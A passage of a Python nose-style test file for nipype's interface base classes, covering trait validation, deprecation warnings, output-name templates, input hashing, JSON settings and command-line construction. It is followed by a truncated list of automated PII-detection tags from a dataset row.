assign_a = lambda: setattr(a, 'foo', 'a')
yield assert_raises, Exception, assign_a
pkld_a = dumps(a)
unpkld_a = loads(pkld_a)
assign_a_again = lambda: setattr(unpkld_a, 'foo', 'a')
yield assert_raises, Exception, assign_a_again
def test_TraitedSpec_logic():
class spec3(nib.TraitedSpec):
_xor_inputs = ('foo', 'bar')
foo = nib.traits.Int(xor=_xor_inputs,
desc='foo or bar, not both')
bar = nib.traits.Int(xor=_xor_inputs,
desc='bar or foo, not both')
kung = nib.traits.Float(requires=('foo',),
position=0,
desc='kung foo')
class out3(nib.TraitedSpec):
output = nib.traits.Int
class MyInterface(nib.BaseInterface):
input_spec = spec3
output_spec = out3
myif = MyInterface()
yield assert_raises, TypeError, setattr, myif.inputs, 'kung', 10.0
myif.inputs.foo = 1
yield assert_equal, myif.inputs.foo, 1
set_bar = lambda: setattr(myif.inputs, 'bar', 1)
yield assert_raises, IOError, set_bar
yield assert_equal, myif.inputs.foo, 1
myif.inputs.kung = 2
yield assert_equal, myif.inputs.kung, 2.0
def test_deprecation():
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec1(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='0.1')
spec_instance = DeprecationSpec1()
set_foo = lambda: setattr(spec_instance, 'foo', 1)
yield assert_raises, nib.TraitError, set_foo
yield assert_equal, len(w), 0, 'no warnings, just errors'
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec1numeric(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='0.1')
spec_instance = DeprecationSpec1numeric()
set_foo = lambda: setattr(spec_instance, 'foo', 1)
yield assert_raises, nib.TraitError, set_foo
yield assert_equal, len(w), 0, 'no warnings, just errors'
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec2(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='100', new_name='bar')
spec_instance = DeprecationSpec2()
set_foo = lambda: setattr(spec_instance, 'foo', 1)
yield assert_raises, nib.TraitError, set_foo
yield assert_equal, len(w), 0, 'no warnings, just errors'
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec3(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='1000', new_name='bar')
bar = nib.traits.Int()
spec_instance = DeprecationSpec3()
not_raised = True
try:
spec_instance.foo = 1
except nib.TraitError:
not_raised = False
yield assert_true, not_raised
yield assert_equal, len(w), 1, 'deprecated warning 1 %s' % [w1.message for w1 in w]
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec3(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='1000', new_name='bar')
bar = nib.traits.Int()
spec_instance = DeprecationSpec3()
not_raised = True
try:
spec_instance.foo = 1
except nib.TraitError:
not_raised = False
yield assert_true, not_raised
yield assert_equal, spec_instance.foo, Undefined
yield assert_equal, spec_instance.bar, 1
yield assert_equal, len(w), 1, 'deprecated warning 2 %s' % [w1.message for w1 in w]
def test_namesource():
tmp_infile = setup_file()
tmpd, nme, ext = split_filename(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
class spec2(nib.CommandLineInputSpec):
moo = nib.File(name_source=['doo'], hash_files=False, argstr="%s",
position=2)
doo = nib.File(exists=True, argstr="%s", position=1)
goo = traits.Int(argstr="%d", position=4)
poo = nib.File(name_source=['goo'], hash_files=False, argstr="%s", position=3)
class TestName(nib.CommandLine):
_cmd = "mycommand"
input_spec = spec2
testobj = TestName()
testobj.inputs.doo = tmp_infile
testobj.inputs.goo = 99
yield assert_true, '%s_generated' % nme in testobj.cmdline
testobj.inputs.moo = "my_%s_template"
yield assert_true, 'my_%s_template' % nme in testobj.cmdline
os.chdir(pwd)
teardown_file(tmpd)
def test_chained_namesource():
tmp_infile = setup_file()
tmpd, nme, ext = split_filename(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
class spec2(nib.CommandLineInputSpec):
doo = nib.File(exists=True, argstr="%s", position=1)
moo = nib.File(name_source=['doo'], hash_files=False, argstr="%s",
position=2, name_template='%s_mootpl')
poo = nib.File(name_source=['moo'], hash_files=False,
argstr="%s", position=3)
class TestName(nib.CommandLine):
_cmd = "mycommand"
input_spec = spec2
testobj = TestName()
testobj.inputs.doo = tmp_infile
res = testobj.cmdline
yield assert_true, '%s' % tmp_infile in res
yield assert_true, '%s_mootpl ' % nme in res
yield assert_true, '%s_mootpl_generated' % nme in res
os.chdir(pwd)
teardown_file(tmpd)
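# The templates compose in the chained case: with nme == 'foo', moo renders
# as 'foo_mootpl' via its name_template, and poo, sourced from moo, becomes
# 'foo_mootpl_generated', which is what the asserts above verify.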
def test_cycle_namesource1():
tmp_infile = setup_file()
tmpd, nme, ext = split_filename(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
class spec3(nib.CommandLineInputSpec):
moo = nib.File(name_source=['doo'], hash_files=False, argstr="%s",
position=1, name_template='%s_mootpl')
poo = nib.File(name_source=['moo'], hash_files=False,
argstr="%s", position=2)
doo = nib.File(name_source=['poo'], hash_files=False,
argstr="%s", position=3)
class TestCycle(nib.CommandLine):
_cmd = "mycommand"
input_spec = spec3
# Check that an exception is raised
to0 = TestCycle()
not_raised = True
try:
to0.cmdline
except nib.NipypeInterfaceError:
not_raised = False
yield assert_false, not_raised
os.chdir(pwd)
teardown_file(tmpd)
def test_cycle_namesource2():
tmp_infile = setup_file()
tmpd, nme, ext = split_filename(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
class spec3(nib.CommandLineInputSpec):
moo = nib.File(name_source=['doo'], hash_files=False, argstr="%s",
position=1, name_template='%s_mootpl')
poo = nib.File(name_source=['moo'], hash_files=False,
argstr="%s", position=2)
doo = nib.File(name_source=['poo'], hash_files=False,
argstr="%s", position=3)
class TestCycle(nib.CommandLine):
_cmd = "mycommand"
input_spec = spec3
# Check that loop can be broken by setting one of the inputs
to1 = TestCycle()
to1.inputs.poo = tmp_infile
not_raised = True
res = None
try:
res = to1.cmdline
except nib.NipypeInterfaceError:
not_raised = False
print(res)
yield assert_true, not_raised
yield assert_true, '%s' % tmp_infile in res
yield assert_true, '%s_generated' % nme in res
yield assert_true, '%s_generated_mootpl' % nme in res
os.chdir(pwd)
teardown_file(tmpd)
def checknose():
""""""check version of nose for known incompatability""""""
mod = __import__('nose')
if mod.__versioninfo__[1] <= 11:
return 0
else:
return 1
@skipif(checknose)
def test_TraitedSpec_withFile():
tmp_infile = setup_file()
tmpd, nme = os.path.split(tmp_infile)
yield assert_true, os.path.exists(tmp_infile)
class spec2(nib.TraitedSpec):
moo = nib.File(exists=True)
doo = nib.traits.List(nib.File(exists=True))
infields = spec2(moo=tmp_infile, doo=[tmp_infile])
hashval = infields.get_hashval(hash_method='content')
yield assert_equal, hashval[1], 'PI:KEY'
teardown_file(tmpd)
@skipif(checknose)
def test_TraitedSpec_withNoFileHashing():
tmp_infile = setup_file()
tmpd, nme = os.path.split(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
yield assert_true, os.path.exists(tmp_infile)
class spec2(nib.TraitedSpec):
moo = nib.File(exists=True, hash_files=False)
doo = nib.traits.List(nib.File(exists=True))
infields = spec2(moo=nme, doo=[tmp_infile])
hashval = infields.get_hashval(hash_method='content')
yield assert_equal, hashval[1], 'PI:KEY'
class spec3(nib.TraitedSpec):
moo = nib.File(exists=True, name_source="doo")
doo = nib.traits.List(nib.File(exists=True))
infields = spec3(moo=nme, doo=[tmp_infile])
hashval1 = infields.get_hashval(hash_method='content')
class spec4(nib.TraitedSpec):
moo = nib.File(exists=True)
doo = nib.traits.List(nib.File(exists=True))
infields = spec4(moo=nme, doo=[tmp_infile])
hashval2 = infields.get_hashval(hash_method='content')
yield assert_not_equal, hashval1[1], hashval2[1]
os.chdir(pwd)
teardown_file(tmpd)
def test_Interface():
yield assert_equal, nib.Interface.input_spec, None
yield assert_equal, nib.Interface.output_spec, None
yield assert_raises, NotImplementedError, nib.Interface
yield assert_raises, NotImplementedError, nib.Interface.help
yield assert_raises, NotImplementedError, nib.Interface._inputs_help
yield assert_raises, NotImplementedError, nib.Interface._outputs_help
yield assert_raises, NotImplementedError, nib.Interface._outputs
class DerivedInterface(nib.Interface):
def __init__(self):
pass
nif = DerivedInterface()
yield assert_raises, NotImplementedError, nif.run
yield assert_raises, NotImplementedError, nif.aggregate_outputs
yield assert_raises, NotImplementedError, nif._list_outputs
yield assert_raises, NotImplementedError, nif._get_filecopy_info
def test_BaseInterface():
yield assert_equal, nib.BaseInterface.help(), None
yield assert_equal, nib.BaseInterface._get_filecopy_info(), []
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
goo = nib.traits.Int(desc='a random int', mandatory=True)
moo = nib.traits.Int(desc='a random int', mandatory=False)
hoo = nib.traits.Int(desc='a random int', usedefault=True)
zoo = nib.File(desc='a file', copyfile=False)
woo = nib.File(desc='a file', copyfile=True)
class OutputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
class DerivedInterface(nib.BaseInterface):
input_spec = InputSpec
yield assert_equal, DerivedInterface.help(), None
yield assert_true, 'moo' in ''.join(DerivedInterface._inputs_help())
yield assert_equal, DerivedInterface()._outputs(), None
yield assert_equal, DerivedInterface._get_filecopy_info()[0]['key'], 'woo'
yield assert_true, DerivedInterface._get_filecopy_info()[0]['copy']
yield assert_equal, DerivedInterface._get_filecopy_info()[1]['key'], 'zoo'
yield assert_false, DerivedInterface._get_filecopy_info()[1]['copy']
yield assert_equal, DerivedInterface().inputs.foo, Undefined
yield assert_raises, ValueError, DerivedInterface()._check_mandatory_inputs
yield assert_equal, DerivedInterface(goo=1)._check_mandatory_inputs(), None
yield assert_raises, ValueError, DerivedInterface().run
yield assert_raises, NotImplementedError, DerivedInterface(goo=1).run
class DerivedInterface2(DerivedInterface):
output_spec = OutputSpec
def _run_interface(self, runtime):
return runtime
yield assert_equal, DerivedInterface2.help(), None
yield assert_equal, DerivedInterface2()._outputs().foo, Undefined
yield assert_raises, NotImplementedError, DerivedInterface2(goo=1).run
nib.BaseInterface.input_spec = None
yield assert_raises, Exception, nib.BaseInterface
def test_BaseInterface_load_save_inputs():
tmp_dir = tempfile.mkdtemp()
tmp_json = os.path.join(tmp_dir, 'settings.json')
class InputSpec(nib.TraitedSpec):
input1 = nib.traits.Int()
input2 = nib.traits.Float()
input3 = nib.traits.Bool()
input4 = nib.traits.Str()
class DerivedInterface(nib.BaseInterface):
input_spec = InputSpec
def __init__(self, **inputs):
super(DerivedInterface, self).__init__(**inputs)
inputs_dict = {'input1': 12, 'input3': True,
'input4': 'some string'}
bif = DerivedInterface(**inputs_dict)
bif.save_inputs_to_json(tmp_json)
bif2 = DerivedInterface()
bif2.load_inputs_from_json(tmp_json)
yield assert_equal, bif2.inputs.get_traitsfree(), inputs_dict
bif3 = DerivedInterface(from_file=tmp_json)
yield assert_equal, bif3.inputs.get_traitsfree(), inputs_dict
inputs_dict2 = inputs_dict.copy()
inputs_dict2.update({'input4': 'some other string'})
bif4 = DerivedInterface(from_file=tmp_json, input4=inputs_dict2['input4'])
yield assert_equal, bif4.inputs.get_traitsfree(), inputs_dict2
bif5 = DerivedInterface(input4=inputs_dict2['input4'])
bif5.load_inputs_from_json(tmp_json, overwrite=False)
yield assert_equal, bif5.inputs.get_traitsfree(), inputs_dict2
bif6 = DerivedInterface(input4=inputs_dict2['input4'])
bif6.load_inputs_from_json(tmp_json)
yield assert_equal, bif6.inputs.get_traitsfree(), inputs_dict
# test get hashval in a complex interface
from nipype.interfaces.ants import Registration
settings = example_data(example_data('smri_ants_registration_settings.json'))
with open(settings) as setf:
data_dict = json.load(setf)
tsthash = Registration()
tsthash.load_inputs_from_json(settings)
yield assert_equal, {}, check_dict(data_dict, tsthash.inputs.get_traitsfree())
tsthash2 = Registration(from_file=settings)
yield assert_equal, {}, check_dict(data_dict, tsthash2.inputs.get_traitsfree())
_, hashvalue = tsthash.inputs.get_hashval(hash_method='timestamp')
yield assert_equal, 'ec5755e07287e04a4b409e03b77a517c', hashvalue
def test_input_version():
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
obj = DerivedInterface1()
yield assert_not_raises, obj._check_version_requirements, obj.inputs
config.set('execution', 'stop_on_unknown_version', True)
yield assert_raises, Exception, obj._check_version_requirements, obj.inputs
config.set_default_config()
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
_version = '0.8'
obj = DerivedInterface1()
obj.inputs.foo = 1
yield assert_raises, Exception, obj._check_version_requirements
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
_version = '0.10'
obj = DerivedInterface1()
yield assert_not_raises, obj._check_version_requirements, obj.inputs
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
_version = '0.9'
obj = DerivedInterface1()
obj.inputs.foo = 1
yield assert_not_raises, obj._check_version_requirements, obj.inputs
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', max_ver='0.7')
class DerivedInterface2(nib.BaseInterface):
input_spec = InputSpec
_version = '0.8'
obj = DerivedInterface2()
obj.inputs.foo = 1
yield assert_raises, Exception, obj._check_version_requirements
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', max_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
_version = '0.9'
obj = DerivedInterface1()
obj.inputs.foo = 1
yield assert_not_raises, obj._check_version_requirements, obj.inputs
def test_output_version():
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
class OutputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.9')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
output_spec = OutputSpec
_version = '0.10'
obj = DerivedInterface1()
yield assert_equal, obj._check_version_requirements(obj._outputs()), []
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
class OutputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.11')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
output_spec = OutputSpec
_version = '0.10'
obj = DerivedInterface1()
yield assert_equal, obj._check_version_requirements(obj._outputs()), ['foo']
class InputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int')
class OutputSpec(nib.TraitedSpec):
foo = nib.traits.Int(desc='a random int', min_ver='0.11')
class DerivedInterface1(nib.BaseInterface):
input_spec = InputSpec
output_spec = OutputSpec
_version = '0.10'
def _run_interface(self, runtime):
return runtime
def _list_outputs(self):
return {'foo': 1}
obj = DerivedInterface1()
yield assert_raises, KeyError, obj.run
def test_Commandline():
yield assert_raises, Exception, nib.CommandLine
ci = nib.CommandLine(command='which')
yield assert_equal, ci.cmd, 'which'
yield assert_equal, ci.inputs.args, Undefined
ci2 = nib.CommandLine(command='which', args='ls')
yield assert_equal, ci2.cmdline, 'which ls'
ci3 = nib.CommandLine(command='echo')
ci3.inputs.environ = {'MYENV': 'foo'}
res = ci3.run()
yield assert_equal, res.runtime.environ['MYENV'], 'foo'
yield assert_equal, res.outputs, None
class CommandLineInputSpec1(nib.CommandLineInputSpec):
foo = nib.Str(argstr='%s', desc='a str')
goo = nib.traits.Bool(argstr='-g', desc='a bool', position=0)
hoo = nib.traits.List(argstr='-l %s', desc='a list')
moo = nib.traits.List(argstr='-i %d...', desc='a repeated list',
position=-1)
noo = nib.traits.Int(argstr='-x %d', desc='an int')
roo = nib.traits.Str(desc='not on command line')
soo = nib.traits.Bool(argstr="-soo")
nib.CommandLine.input_spec = CommandLineInputSpec1
ci4 = nib.CommandLine(command='cmd')
ci4.inputs.foo = 'foo'
ci4.inputs.goo = True
ci4.inputs.hoo = ['a', 'b']
ci4.inputs.moo = [1, 2, 3]
ci4.inputs.noo = 0
ci4.inputs.roo = 'hello'
ci4.inputs.soo = False
cmd = ci4._parse_inputs()
yield assert_equal, cmd[0], '-g'
yield assert_equal, cmd[-1], '-i 1 -i 2 -i 3'
yield assert_true, 'hello' not in ' '.join(cmd)
yield assert_true, '-soo' not in ' '.join(cmd)
ci4.inputs.soo = True
cmd = ci4._parse_inputs()
yield assert_true, '-soo' in ' '.join(cmd)
class CommandLineInputSpec2(nib.CommandLineInputSpec):
foo = nib.File(argstr='%s', desc='a str', genfile=True)
nib.CommandLine.input_spec = CommandLineInputSpec2
ci5 = nib.CommandLine(command='cmd')
yield assert_raises, NotImplementedError, ci5._parse_inputs
class DerivedClass(nib.CommandLine):
input_spec = CommandLineInputSpec2
def _gen_filename(self, name):
return 'filename'
ci6 = DerivedClass(command='cmd')
yield assert_equal, ci6._parse_inputs()[0], 'filename'
nib.CommandLine.input_spec = nib.CommandLineInputSpec
def test_Commandline_environ():
from nipype import config
config.set_default_config()
ci3 = nib.CommandLine(command='echo')
res = ci3.run()
yield assert_equal, res.runtime.environ['DISPLAY'], ':1'
config.set('execution', 'display_variable', ':3')
res = ci3.run()
yield assert_false, 'DISPLAY' in ci3.inputs.environ
yield assert_equal, res.runtime.environ['DISPLAY'], ':3'
ci3.inputs.environ = {'DISPLAY': ':2'}
res = ci3.run()
yield assert_equal, res.runtime.environ['DISPLAY'], ':2'
def test_CommandLine_output():
tmp_infile = setup_file()
tmpd, name = os.path.split(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
yield assert_true, os.path.exists(tmp_infile)
ci = nib.CommandLine(command='ls -l')
ci.inputs.terminal_output = 'allatonce'
res = ci.run()
yield assert_equal, res.runtime.merged, ''
yield assert_true, name in res.runtime.stdout
ci = nib.CommandLine(command='ls -l')
ci.inputs.terminal_output = 'file'
res = ci.run()
yield assert_true, 'stdout.nipype' in res.runtime.stdout
yield assert_true, isinstance(res.runtime.stdout, (str, bytes))
ci = nib.CommandLine(command='ls -l')
ci.inputs.terminal_output = 'none'
res = ci.run()
yield assert_equal, res.runtime.stdout, ''
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_true, 'stdout.nipype' in res.runtime.stdout
os.chdir(pwd)
teardown_file(tmpd)
def test_global_CommandLine_output():
tmp_infile = setup_file()
tmpd, name = os.path.split(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_true, name in res.runtime.stdout
yield assert_true, os.path.exists(tmp_infile)
nib.CommandLine.set_default_terminal_output('allatonce')
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_equal, res.runtime.merged, ''
yield assert_true, name in res.runtime.stdout
nib.CommandLine.set_default_terminal_output('file')
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_true, 'stdout.nipype' in res.runtime.stdout
nib.CommandLine.set_default_terminal_output('none')
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_equal, res.runtime.stdout, ''
os.chdir(pwd)
teardown_file(tmpd)
def assert_not_raises(fn, *args, **kwargs):
fn(*args, **kwargs)
return True
def check_dict(ref_dict, tst_dict):
""""""Compare dictionaries of inputs and and those loaded from json files""""""
def to_list(x):
if isinstance(x, tuple):
x = list(x)
if isinstance(x, list):
for i, xel in enumerate(x):
x[i] = to_list(xel)
return x
failed_dict = {}
for key, value in list(ref_dict.items()):
newval = to_list(tst_dict[key])
if newval != value:
failed_dict[key] = (value, newval)
return failed_dict
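# For example, check_dict({'a': [1, 2]}, {'a': (1, 2)}) returns {} because
# the tuple from the test dict is normalised to a list before comparison.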
",26974,"[['UK_NHS', '0000000000'], ['PERSON', 'ts=4 sw=4'], ['PERSON', 'simplejson'], ['PERSON', 'Bunch(b=2'], ['LOCATION', 'c=3'], ['LOCATION', 'b=2'], ['PERSON', 'json'], ['PERSON', 'json'], ['LOCATION', 'os.path.join(tmp_dir'], ['PERSON', 'teardown_file(tmp_dir'], ['NRP', 'shutil.rmtree(tmp_dir'], ['LOCATION', 'spec().goo'], ['PERSON', 'BaseTraitedSpec'], ['DATE_TIME', ""desc='bar""], ['LOCATION', 'myif.inputs.kung'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'Int'], ['PERSON', 'UserWarning'], ['PERSON', 'Int'], ['PERSON', 'my_%s_template'], ['PERSON', 'testobj'], ['LOCATION', 's_mootpl'], ['LOCATION', 'test_cycle_namesource2'], ['PERSON', '=tmp_infile'], ['PERSON', 'hashval1'], ['PERSON', 'nif'], ['LOCATION', 'nib.BaseInterface.help'], ['PERSON', 'tmp_json = os.path.join(tmp_dir'], ['PERSON', 'Int'], ['PERSON', 'Bool'], ['PERSON', 'input4 = nib.traits'], ['PERSON', 'input4'], ['PERSON', 'input4'], ['PERSON', 'setf'], ['LOCATION', 'tsthash.inputs.get_traitsfree'], ['LOCATION', 'tsthash2.inputs.get_traitsfree'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['NRP', ""desc='a""], ['LOCATION', ""desc='an""], ['PERSON', 'roo = nib.traits'], ['PERSON', ""ci6 = DerivedClass(command='cmd'""], ['LOCATION', 'test_CommandLine_output'], ['PERSON', 'fn(*args'], ['LOCATION', 'json'], ['PERSON', 'to_list(xel'], ['URL', 'library.in'], ['URL', 'nipype.interfaces.ba'], ['URL', 'nipype.utils.fi'], ['URL', 'nipype.interfaces.ba'], ['URL', 'traits.testing.no'], ['URL', 'b.ge'], ['URL', 'b.ge'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'nib.md'], ['URL', 'fp.re'], ['URL', 'tempfile.mk'], ['URL', 'os.path.jo'], ['URL', 'nib.Tr'], ['URL', 'nib.Tr'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.traits.Tr'], ['URL', 'infields.ge'], ['URL', 'nib.Ba'], ['URL', 'a.ad'], ['URL', 'nib.traits.Int'], ['URL', 'a.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'myif.in'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.in'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.in'], ['URL', 'myif.in'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'instance.fo'], ['URL', 'nib.Tr'], ['URL', 'w1.me'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'instance.fo'], ['URL', 'nib.Tr'], ['URL', 'instance.fo'], ['URL', 'instance.ba'], ['URL', 'w1.me'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'traits.Int'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'testobj.inputs.do'], ['URL', 'testobj.in'], ['URL', 'testobj.cm'], ['URL', 'testobj.inputs.mo'], ['URL', 'testobj.cm'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], 
['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'testobj.inputs.do'], ['URL', 'testobj.cm'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'to0.cm'], ['URL', 'nib.Ni'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'to1.in'], ['URL', 'to1.cm'], ['URL', 'nib.Ni'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'os.ch'], ['URL', 'nib.Interface.in'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nif.ru'], ['URL', 'nif.ag'], ['URL', 'nib.Ba'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', '.inputs.fo'], ['URL', 'nib.BaseInterface.in'], ['URL', 'nib.Ba'], ['URL', 'tempfile.mk'], ['URL', 'os.path.jo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.traits.St'], ['URL', 'nib.Ba'], ['URL', 'bif.sa'], ['URL', 'bif2.inputs.ge'], ['URL', 'bif3.inputs.ge'], ['URL', 'dict.co'], ['URL', 'bif4.inputs.ge'], ['URL', 'bif5.inputs.ge'], ['URL', 'bif6.inputs.ge'], ['URL', 'nipype.interfaces.an'], ['URL', 'tsthash.inputs.ge'], ['URL', 'tsthash2.inputs.ge'], ['URL', 'tsthash.inputs.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.in'], ['URL', 'config.se'], ['URL', 'obj.in'], ['URL', 'config.se'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.ru'], ['URL', 'nib.Com'], ['URL', 'nib.Com'], ['URL', 'ci.cm'], ['URL', 'ci.inputs.ar'], ['URL', 'nib.Com'], ['URL', 'ci2.cm'], ['URL', 'nib.Com'], ['URL', 'ci3.in'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'nib.Com'], ['URL', 'nib.St'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.traits.Li'], ['URL', 'nib.traits.Li'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.St'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 
